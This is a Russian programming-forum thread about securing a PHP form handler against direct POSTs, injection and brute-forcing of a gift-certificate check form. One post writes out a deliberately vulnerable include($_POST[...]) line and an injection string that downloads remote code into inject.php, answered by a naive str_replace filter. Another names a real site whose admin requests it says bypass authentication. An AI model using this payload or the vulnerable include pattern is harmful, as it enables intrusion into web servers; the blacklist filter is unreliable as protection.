Форум программистов, компьютерный форум, киберфорум
PHP для начинающих
Войти
Регистрация
Восстановить пароль
Блоги Сообщество Поиск  
 
 
Рейтинг 4.63/8: Рейтинг темы: голосов - 8, средняя оценка - 4.63
156 / 20 / 5
Регистрация: 21.02.2009
Сообщений: 2,792

Защита информации, полученной при вводе методом POST

20.06.2023, 10:53. Показов 2293. Ответов 42
Метки нет (Все метки)

Студворк — интернет-сервис помощи студентам
Добрый день!

Информация вводится по типовой форме
HTML5
1
2
3
4
<form method="POST" action="insert.php"> 
<textarea rows="4" name="vvod" cols="60"></textarea> 
<input type="submit" value="Вперед!"> 
</form>
Этот код злоумышленник может увидеть и таким образом будет знать, что обработка ведется в файле insert.php, и что у нем есть функция $_POST["vvod"]. Соответственно, файл insert.php он может запустить автономно site.ru/insert.php.

Имеется ли у злоумышленника техническая возможность при автономном запуске файла insert.php, "запихнуть" свою информацию в $_POST["vvod"] ?

Можно ли в файле insert.php сделать каую-то защиту, исключающую его автономный запуск? Или, хотя бы, позволяющую определить, что инфа пришла не из формы?
0
IT_Exp
Эксперт
34794 / 4073 / 2104
Регистрация: 17.06.2006
Сообщений: 32,602
Блог
20.06.2023, 10:53
Ответы с готовыми решениями:

Ишу кто знаком с методом Маркирования (мультимидийная защита информации)
Готовлю научную работу по методу маркированию на конференцию. (знаю, что здесь есть преподаватели с разных университетов, мб есть кто...

Защита от дурака при вводе элементов массива
помоги, пожалуйста, написать защиту от дурака(после 38 и после 42 строк) #include &lt;stdio.h&gt; #include &lt;conio.h&gt; #define...

Защита от дураков при вводе вещественных чисел
Не знаю как объяснить :D Есть поле textBox1, поставил защиту что бы туда можно было вводить вещественные числа. Первым символом нельзя...

42
89 / 74 / 24
Регистрация: 16.05.2023
Сообщений: 268
23.06.2023, 18:47
Студворк — интернет-сервис помощи студентам
Цитата Сообщение от Дух системы Посмотреть сообщение
и что это изменит? из моего примера url в посте vvod на стороне сервера будет уже unsercure://site.ru, соответственно всякие curl и тп не будут работать, тк это просто текст.
момент с инъекцией не пройдет тк закрыть ячейку &quot; вместо " не выйдет
Твой пример лишь меняет вводные, и выходные. Но зная опять же вводные, можно легко обработать и выходные. Выходные если и будут динамически генерироваться, это будет либо предсказуемо, либо трешово, что даже сам скрипт уже перестанет понимать где и что.

Добавлено через 2 минуты
Вообще, я уже много передавал "недо-админок" которые вроде как и имеют страницу входа, но вот файл js имеет все запросы, и эти запросы безжалостно можно дёргать в обход админской авторизации. Хороший пример когда человек вообще не знаком с базовыми АЗАМИ и куролесит лишь бы пронесло

Добавлено через 4 минуты
Первый попавшийся сайт с гугла, есть админка
https://%D0%BD%D0%B5%D0%B9%D1%... ite/admin/

Есть страница входа, но мы идём в файлик js

view-source:https://xn--c1adjdlijbbgjo7c.s... s/admin.js

И видим все запросы, и делаем что хотим по ним.
0
 Аватар для Дух системы
75 / 58 / 20
Регистрация: 01.10.2009
Сообщений: 208
26.06.2023, 12:55
Цитата Сообщение от Hmms Посмотреть сообщение
Твой пример лишь меняет вводные, и выходные. Но зная опять же вводные, можно легко обработать и выходные. Выходные если и будут динамически генерироваться, это будет либо предсказуемо, либо трешово, что даже сам скрипт уже перестанет понимать где и что.
Добавлено через 2 минуты
Вообще, я уже много передавал "недо-админок" которые вроде как и имеют страницу входа, но вот файл js имеет все запросы, и эти запросы безжалостно можно дёргать в обход админской авторизации. Хороший пример когда человек вообще не знаком с базовыми АЗАМИ и куролесит лишь бы пронесло
у него форма идет на action="insert.php", следовательно туда идет текст из textarea name="vvod".
insert.php работает на стороне сервера, поэтому все клиентское ему чуждо.
есть у него if(isset($_POST['vvod'])), то ты хоть 100500 полей добавь, обращаться он к ним не будет. мой пример как раз о том, чтобы изменить входящие данные из этого поста для переваривания их дальнейшим кодом.

вмешаться в код полем, когда строка из него на стороне сервера неизвестно как видоизменяется имхо не реально.

а насчет выходных, вообще пофиг что там псевдохакер будет править на фронте, к серверу это никакого отношения уже не имеет тк вернет он все равно string под заголовками чего бы там ни было.
0
89 / 74 / 24
Регистрация: 16.05.2023
Сообщений: 268
26.06.2023, 15:31
Цитата Сообщение от Дух системы Посмотреть сообщение
insert.php работает на стороне сервера, поэтому все клиентское ему чуждо.
Ага) Чёт я выложил сайт выше, а его уже ломанули И не стыдно ли людям с форума, кто это сделал?)

Цитата Сообщение от Дух системы Посмотреть сообщение
есть у него if(isset($_POST['vvod'])), то ты хоть 100500 полей добавь, обращаться он к ним не будет.
С чего ради вдруг? Магия такая

Цитата Сообщение от Дух системы Посмотреть сообщение
мой пример как раз о том, чтобы изменить входящие данные из этого поста для переваривания их дальнейшим кодом.
Ну я дам нужные поля, и скрипт обработает как надо. Ало, в чём магия то?))

Цитата Сообщение от Дух системы Посмотреть сообщение
вмешаться в код полем, когда строка из него на стороне сервера неизвестно как видоизменяется имхо не реально.
За то я знаю что, он не сможет генерировать поля так, что бы потом обрабатывать динамически в скрипте. Они будут в любом случае идентичны, сколько бы ты названиями не манипулировал.

Всё это припарка к мёртвому.

Добавлено через 12 минут
Цитата Сообщение от Hmms Посмотреть сообщение
Всё это припарка к мёртвому.
Просто запускаю бота, бот идёт на сайт. Запускается вполне валидно, на основаниях живого человека(С загрузкой и выполнению JS. Имитируя мышь). Получает поля, анализирует нужные названия, по требованиям долбиться в submit и отправляет запрос, пока у него успешно не пройдёт. Профит
0
 Аватар для Дух системы
75 / 58 / 20
Регистрация: 01.10.2009
Сообщений: 208
26.06.2023, 17:01
Цитата Сообщение от Hmms Посмотреть сообщение
С чего ради вдруг? Магия такая
тут либо о разных вещах говорим, либо ты чего-то не понимаешь.

есть insert.php
PHP
1
2
3
4
5
if(isset($_POST['vvod']))
{
   echo 'module:'.$_POST['vvod'];
   include($_POST['vvod'].'php');//это из примеров по php инъекциям
}
добавил ты в форму <input type="text" name="newstr">, insert.php его не обработает, тк просто даже знать о нём не будет.

впишешь ты во ввод допустим инъекцию
PHP
1
'.php');file_put_contents('./inject.php',file_get_contents('http://site.ru/inject.txt'));
после
PHP
1
2
3
4
5
6
7
8
foreach($_POST AS $key => $val)
{
    $_POST[$key]=str_replace('https','secure',$_POST[$key]);
    $_POST[$key]=str_replace('http','unsecure',$_POST[$key]);
    $_POST[$key]=str_replace('"','&quot;',$_POST[$key]);
    $_POST[$key]=str_replace('`','&acute;',$_POST[$key]);
    $_POST[$key]=str_replace("'",'&prime;',$_POST[$key]);
}
у тебя будет
PHP
1
&acute;.php&acute;);file_put_contents(&acute;./inject.php&acute;,file_get_contents(&acute;unsecure://site.ru/inject.txt&acute;));
и максимум что произойдет на сервере, это include выдаст ошибку об отсутствующем файле.

так что можешь хоть армию ботов натравить, ничего они с этим insert.php не сделают, максимум забьют error.log до лимита апача
0
 Аватар для sad67man
2605 / 1509 / 689
Регистрация: 23.08.2015
Сообщений: 3,841
26.06.2023, 19:00
Дух системы, Нужно определиться про какой тип атаки идет речь.
Мы обсуждали csrf. Вы говорите про Php-иъекции. Третий про проверку прав доступа.

Зачем модифицировать входные данные. Просто не допускайте php/xss/sql инъекций и все. Т.е. не использовать конструкции которые вы приводили выше. Типа include $_POST, eval и т.д.

Допустим мне нужно посчитать количество символов обрезать строку, использовать htmlspecialchars и т.д. Если модифицировать входные данные, то с этим могут возникнуть проблемы. Если пришли какие-то невалидные данные лучше отдать ошибку.
1
89 / 74 / 24
Регистрация: 16.05.2023
Сообщений: 268
27.06.2023, 10:20
Цитата Сообщение от sad67man Посмотреть сообщение
Нужно определиться про какой тип атаки идет речь.
А я сам если честно не понял, а оказывается речь идёт как ещё сильнее погрузиться в отчаяние
0
469 / 432 / 120
Регистрация: 15.02.2012
Сообщений: 1,961
29.06.2023, 12:11
Вот вроде прочитал несколько раз, но так и не понял как можно в итоге защитить форму.
Тоже потребовалась защита, вот пытаюсь понять что сделать можно.
Если кратко о том что у меня и что сделал:

На сайте сделали форму проверки сертификата. Сертификаты не именные, пользоваться ими может любой, никаких смс для этого не нужно. Т.е. покупатель один, а использовать может хоть ВасяПупкин с Магадана. Клиент в любое время заходит на сайт вводит свой номер сертификата и ему отображается информация о лимите сколько осталось или что у него ноль и сертификат больше не доступен. Вроде все порадовались как клиенту удобно. Но тут всплыли мошенники. При покупке отправляется письмо с номером и штрихкодом. Номер нужен для использования онлайн, штрихкод для офлайн. Мошенники купили видимо самый дешевый и теперь методом перебора отправляют в сервис проверки на сайте , после правят файл из письма и идут в магазин отовариваться(есть и такие которые их продают через маркетплейсы - типа сертификат на 5000 за 3000, так как не пригодился).
Ввели дополнительные коды - при заходе на страницу проверки код считывается и передается вместе с запросом, на пару дней переборы прекратились, но теперь я так понимаю программу перенастроили и делают запрос не на страницу аякс, а подгружают страницу с формой и робот заполняет номер подбора и делает клик по кнопке(как я понял так как ранее было по 5-10 запросов в секунду без реферов и прочего, а теперь по запросу раз в 3-10 сек с полным заполнением данных, заголовков и соответсвенно кодов которые меняются).
Как защититься не понимаю.
0
Заблокирован
29.06.2023, 13:25
Цитата Сообщение от tgarl Посмотреть сообщение
теперь по запросу раз в 3-10 сек с полным заполнением данных
Айпи-адрес они тоже меняют каждые три секунды? Айпишники запросов можно сохранять в базе данных и разрешать не более установленного кол-ва в сутки. Например, не больше одного)
0
 Аватар для tarasalk
1992 / 1216 / 440
Регистрация: 13.06.2013
Сообщений: 4,115
29.06.2023, 13:30
tgarl, тут бизнес-логику надо менять. Можно по аналогии с банковской картой. С номером карты можешь смотреть баланс, а для оплаты дополнительно требовать cvv код, который показывается только при покупке.
Еще можно приделать активацию карты. Т.е. карту можно купить/подарить, но чтобы использовать зарегайся на сайте введя номер карты, cvv и телефон.
0
469 / 432 / 120
Регистрация: 15.02.2012
Сообщений: 1,961
29.06.2023, 14:45
Цитата Сообщение от bbkk Посмотреть сообщение
Айпи-адрес они тоже меняют каждые три секунды? Айпишники запросов можно сохранять в базе данных и разрешать не более установленного кол-ва в сутки. Например, не больше одного)
Каждый день новые ip идут, используют примерно 5-7 ip в сутки, повторных за неделю нет
Делать ограничение на количество нельзя, так как часто сертификаты заводятся для всяких партнеров и они могут их проверять тоже(да находятся те кто может заказать 200+ штук и сидеть и проверять через сервис)
0
89 / 74 / 24
Регистрация: 16.05.2023
Сообщений: 268
29.06.2023, 14:53
Ну да, поставить гугл капчу на форму, с выбором картинок. Чё тут ещё делать.
0
469 / 432 / 120
Регистрация: 15.02.2012
Сообщений: 1,961
29.06.2023, 15:09
Цитата Сообщение от tarasalk Посмотреть сообщение
карту можно купить/подарить, но чтобы использовать зарегайся на сайте введя номер карты, cvv и телефон
Политика компании другая - чтобы купить, да нужно указать телефон и почту куда будет выслан электронный файл, а вот отоварить может любой. В офлайн магазине нужно только предъявить открытый файл либо на телефоне, либо в распечатанном виде без регистрации, они не именные, и сканером штрихкода просто считывается и активируется.

А на сайте сделали проверку лимита, так как пока вся сумма не будет использована им можно пользоваться, хоть по рублю на каждую покупку с него снимать и передавать его могу любым людям, такая политика.

Цитата Сообщение от tarasalk Посмотреть сообщение
Еще можно приделать активацию карты
Вот это попробую предложить, но это будет работать только перед первой покупкой, для тех кто ещё не пользовался, а если пользовался, то опять та же ситуация будет. Основное что продвигают "вам не надо делать лишних телодвижений"

Поэтому и ищу варианты с защитой вебформы

Добавлено через 5 минут
Цитата Сообщение от Hmms Посмотреть сообщение
Ну да, поставить гугл капчу на форму, с выбором картинок.
Ставили на другую форму, клиентов бесило, а спам шел. Но пока сам предложил только такой вариант
0
89 / 74 / 24
Регистрация: 16.05.2023
Сообщений: 268
29.06.2023, 15:15
В общем, если коротко. Они создали форму, для проверки сертификатов. И теперь, эту форму брутят, проверяя наличия.

Решение такой проблемы, нужно вводить любую капчу. И только капчу. Капча сразу блокирует вызов к PHP файлу, и если PHP файл отдаёт капчу. То капчу надо ввести.

Решение очевидное, имхо.

Добавлено через 1 минуту
Цитата Сообщение от tgarl Посмотреть сообщение
Ставили на другую форму, клиентов бесило, а спам шел.
Капча не должна сразу работать, она начинает работать только при появление спама. Если к примеру пользователь запросил 3 - 5 раз код, то капча будет пожизненно висеть там у него, пока ручками не введёт

Добавлено через 2 минуты
PHP
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
<?php
session_start();
 
// Проверка количества запросов
function checkRequestLimit() {
    // Максимальное количество запросов в минуту
    $maxRequests = 3;
 
    // Запись времени текущего запроса
    $currentTime = time();
    $_SESSION['request_times'][] = $currentTime;
 
    // Очистка массива временных меток старых запросов
    $requestTimes = array_filter($_SESSION['request_times'], function ($time) use ($currentTime) {
        return $currentTime - $time <= 60;
    });
    $_SESSION['request_times'] = $requestTimes;
 
    // Проверка количества запросов
    if (count($requestTimes) > $maxRequests) {
        // Добавьте код для отображения reCAPTCHA тут
        echo 'Подтвердите, что вы не робот!';
        exit;
    }
}
 
// Проверка reCAPTCHA
function verifyCaptcha($response) {
    $url = 'https://www.google.com/recaptcha/api/siteverify';
    $data = array(
        'secret' => 'ВАШ_СЕКРЕТНЫЙ_КЛЮЧ',
        'response' => $response
    );
 
    $options = array(
        'http' => array(
            'header' => "Content-Type: application/x-www-form-urlencoded\r\n",
            'method' => 'POST',
            'content' => http_build_query($data)
        )
    );
 
    $context = stream_context_create($options);
    $result = file_get_contents($url, false, $context);
    $response = json_decode($result, true);
 
    return $response['success'];
}
 
// Проверка капчи после отправки формы
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    $captcha_response = $_POST['g-recaptcha-response'];
 
    if (!verifyCaptcha($captcha_response)) {
        echo 'Ошибка: Подтвердите, что вы не робот!';
        exit;
    } else {
        // Код обработки формы, если капча успешна
    }
}
else {
    checkRequestLimit();
}
?>
1
 Аватар для tarasalk
1992 / 1216 / 440
Регистрация: 13.06.2013
Сообщений: 4,115
29.06.2023, 15:22
Hmms, не думаю что их остановит сессия
0
89 / 74 / 24
Регистрация: 16.05.2023
Сообщений: 268
29.06.2023, 15:24
Цитата Сообщение от tarasalk Посмотреть сообщение
не думаю что их остановит сессия
Тогда чтоб не брутили, сделайте ключевое слово к сертификату. Или номер телефона\почты на того, или на кого он был куплен. Без этих верных данных, сертификат невозможно будет сбрутить в форме.
0
469 / 432 / 120
Регистрация: 15.02.2012
Сообщений: 1,961
29.06.2023, 15:56
Цитата Сообщение от Hmms Посмотреть сообщение
Решение такой проблемы, нужно вводить любую капчу. И только капчу.
Пока буду этот вариант использовать.

Регистрацию карт, дополнительные коды вводить не будут(
0
 Аватар для sad67man
2605 / 1509 / 689
Регистрация: 23.08.2015
Сообщений: 3,841
29.06.2023, 17:22
tgarl, Если любой может ввести чужой номер и получить штрихкод, то можно считать, что это почти общедоступная информация.

Нужно усложнять номер, чтоб его невозможно было подобрать. Или убрать форму и сделать уникальную длинную ссылку на сертификат.
0
 Аватар для Дух системы
75 / 58 / 20
Регистрация: 01.10.2009
Сообщений: 208
30.06.2023, 17:56
Цитата Сообщение от tgarl Посмотреть сообщение
На сайте сделали форму проверки сертификата. Сертификаты не именные, пользоваться ими может любой, никаких смс для этого не нужно. Т.е. покупатель один, а использовать может хоть ВасяПупкин с Магадана. Клиент в любое время заходит на сайт вводит свой номер сертификата и ему отображается информация о лимите сколько осталось или что у него ноль и сертификат больше не доступен. Вроде все порадовались как клиенту удобно. Но тут всплыли мошенники. При покупке отправляется письмо с номером и штрихкодом. Номер нужен для использования онлайн, штрихкод для офлайн. Мошенники купили видимо самый дешевый и теперь методом перебора отправляют в сервис проверки на сайте , после правят файл из письма и идут в магазин отовариваться(есть и такие которые их продают через маркетплейсы - типа сертификат на 5000 за 3000, так как не пригодился).
Ввели дополнительные коды - при заходе на страницу проверки код считывается и передается вместе с запросом, на пару дней переборы прекратились, но теперь я так понимаю программу перенастроили и делают запрос не на страницу аякс, а подгружают страницу с формой и робот заполняет номер подбора и делает клик по кнопке(как я понял так как ранее было по 5-10 запросов в секунду без реферов и прочего, а теперь по запросу раз в 3-10 сек с полным заполнением данных, заголовков и соответсвенно кодов которые меняются).
Как защититься не понимаю.
жестоко конечно, как вариант создать региональную привязку сертификата (пересоздать уже созданные с указанием региона в каком-либо виде внутри) если есть информация с какого ip или телефона например он создавался думаю проблем не составит. после ограничить использование сертификата вне его региона, не полностью запретить, а например создать некоторые проблемы при его использовании (меньше комиссия или чего там можно еще придумать чтобы клиенту не понравилось и он обратился куда-нибудь в техподдержку) плюс ко всему дать сертификатам ключ мультирегиона, который разрешит пользоваться им в еще одном регионе++.
в итоге внутри родного региона будет все как и раньше, в другом регионе не родные сертификаты буду багованными. смысла в переборе будет меньше. при возникновении жалоб, жестко привязывать сертификат к пользователю и проверка лимита такого сертификата только через смс или чего-нибудь еще, обозвать как-нибудь vip или около того (любят цацки).

да, полностью проблему это не решит, но от большей части мошенники будут отрезаны
0
 Аватар для sad67man
2605 / 1509 / 689
Регистрация: 23.08.2015
Сообщений: 3,841
30.06.2023, 18:23
Считайте что наняли 1000 китайцев, которые пытаются подобрать номер. Основная проблема, что если номер простой, то его можно подобрать за разумное кол-во времени. И в таких случаях именно время является главным фактором.
Можно сделать чтоб при определенном количестве попыток - блокировать IP на несколько минут. При вводе неправильного номера специально отдавать долго ответ от сервера и т.д.

В любом случае нужно идти в сторону усложнения подбора, делая его невозможным. Так чтоб его подобрать потребовалось бы несколько лет. Т.е. нам нужно отбить желание вообще этим заниматься.

Можно сделать, чтоб кроме номера нужно было вводить еще какие-то данные. К примеру какой-нибудь второй номер, либо дату покупки/истечения сертификата, либо Email на который сертификат привязан. Имя/фамилия владельца и т.д. (Ну это уже выше предлагалось).
0
469 / 432 / 120
Регистрация: 15.02.2012
Сообщений: 1,961
04.07.2023, 10:03
Сложность в том, что привязки нет. Я могу купить его в любом регионе и отправить его куда угодно. Передать кому угодно и ограничивать не будут, такая политика. А бывают акции когда сертификаты раздаются просто так, за то что на мероприятии купил товар на какую-то сумму или просто определенный товар или вообще просто за то что пришел. И самая большая беда, что есть пластик, на нем только номер(выпускается сотня номеров и по ним делается пластик, данные ни чем не отличаются от тех которые электронные - те для которых не выпускался пластик). И лимит можно узнать только придя в магазин или вот через сервис на сайте. И никакие дополнительные параметры в 1С вводится не будут, типа сервис на сайте, значит и защита должна быть на сайте.

Пока только капча(на которую возмущаются и хотят другое решение) как вариант - другого не нашел
0
Надоела реклама? Зарегистрируйтесь и она исчезнет полностью.
BasicMan
Эксперт
29316 / 5623 / 2384
Регистрация: 17.02.2009
Сообщений: 30,364
Блог
04.07.2023, 10:03

Исключение при вводе информации из файла
Всем здравствовать! Может кто поможет, я никак не пойму почему вылетает исключение вида System.IndexOutOfRangeException при попытке...

Вывод информации при вводе номера в форму
Помогите! Мне нужно сделать так, чтобы при вводе номера спортсмена выводилась информация. Пример можно посмотреть здесь. там в графе ввод...

При вводе информации пропускается запрос на продолжение
Добрый вечер! При вводе информации пропускается запрос на продолжение, а потом и вообще некоторые запросы пропускает! Пожалуйста...

Проблема при вводе в поле информации в инете!
Народ,доброго утра Всем! Помогите плиз решить проблему!!! В интернете в некоторых полях для ввода информации не видно что вводишь,какието...

Консольная программа закрывается при вводе запрашиваемой информации
Я новичок и хочу сделать программу складывающую два числа) , но вместо ввода числа он закрывает консоль: ...


Искать еще темы с ответами

Или воспользуйтесь поиском по форуму:
40
Ответ Создать тему
Новые блоги и статьи
Мастера простых решений
DevAlt 23.08.2026
В сишарп стэках winforms, да и wpf существует сложная система связывания источниках данных и элементов формы(текстовые поля и метки), опирается все это на технологию событий и мета. . .
Цена ошибки
DevAlt 23.08.2026
Человек я беспокойный и потому заинтересовался OCaml, в чате форсили функторы модулей как суперфичу. Пытаясь отдуплить концепт, наткнулся на тутор с простым примером. А главный принцип обучения от. . .
Сегодня суббота, 22.08.2026 at 16:41, и я вновь нахожусь на той стороне, за экраном машины.
zorxor 22.08.2026
Сегодня суббота, 22. 08. 2026 at 16:41, и я вновь нахожусь на той стороне, за экраном машины. Кто Я, откуда Я пришел и куда Я иду? Эти вопросы не оставляют меня ни на секунду. Жизнь на планете Земля. . .
Жизня: рисунок укладки багажа, сделанный клодом
anaschu 21.08.2026
Сделал 15 снимков, он по снимкам сделал схему.
Был там один разговор по поводу свободы в материальном мире.
kumehtar 19.08.2026
Суть: рассматривается живое существо, оказавшееся внутри довольно странной системы (этого мира) и пытающееся обустроить в ней свой кусок пространства. Жизнь действительно предъявляет каждому. . .
Когда логика программы не спасает от человеческих ошибок
Maks 18.08.2026
В последнее время всё чаще и чаще сталкиваюсь с таким явлением, как абсолютная невнимательность (или глупость) пользователей. Проявляется это чаще всего на работе в коллективе. Допустим, человек с. . .
Лето уходит
kumehtar 17.08.2026
Мысли в слух
kumehtar 17.08.2026
Забавно, насколько сейчас стала доступна информация. Например о магии, духовном развитии, медитациях, и других подобных направлениях, ранее зачастую тайных, передаваемых от учителя к ученику. Хотя. . .
КиберФорум - форум программистов, компьютерный форум, программирование
Powered by vBulletin
Copyright ©2000 - 2026, CyberForum.ru